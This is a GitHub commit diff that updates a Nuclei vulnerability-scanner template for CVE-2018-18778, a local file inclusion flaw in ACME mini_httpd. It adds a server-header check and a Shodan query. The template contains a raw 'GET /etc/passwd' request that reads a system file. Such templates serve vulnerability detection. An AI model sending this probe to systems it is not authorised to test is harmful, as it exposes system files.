Merge pull request #8446 from projectdiscovery/fix-fp-CVE-2018-18778

Update CVE-2018-18778.yaml
projectdiscovery · Nov 23, 2023 · cfe2e3d · cfe2e3d
2 parents 5218b85 + 0ed1cee
commit cfe2e3d
Showing 1 changed file with 16 additions and 5 deletions.
diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml
@@ -2,7 +2,7 @@ id: CVE-2018-18778
 
 info:
   name: ACME mini_httpd <1.30 - Local File Inclusion
-  author: dhiyaneshDK
+  author: DhiyaneshDK,dogasantos
   severity: medium
   description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
   remediation: |
@@ -17,15 +17,28 @@ info:
     cve-id: CVE-2018-18778
     cwe-id: CWE-200
     epss-score: 0.95125
-    epss-percentile: 0.99128
+    epss-percentile: 0.99079
     cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:*
   metadata:
     max-request: 1
     vendor: acme
     product: mini-httpd
+    shodan-query: 'Server: mini_httpd && 200'
   tags: cve,cve2018,lfi,mini_httpd
 
+flow: http(1) && http(2)
+
 http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Server: mini_httpd"
+
   - raw:
       - |+
         GET /etc/passwd HTTP/1.1
@@ -41,6 +54,4 @@ http:
 
       - type: status
         status:
-          - 200
-
-# digest: 4b0a00483046022100da09e47a3d7c9bc53107fbd4b2cc16c5fa4692a5607a71e513fd724070db8610022100a645b7541183c23f9a401a1cc594bca84910b0e1692af3c4bb82e6633b4d4d88:922c64590222798bb761d5b6d8e72950
+          - 200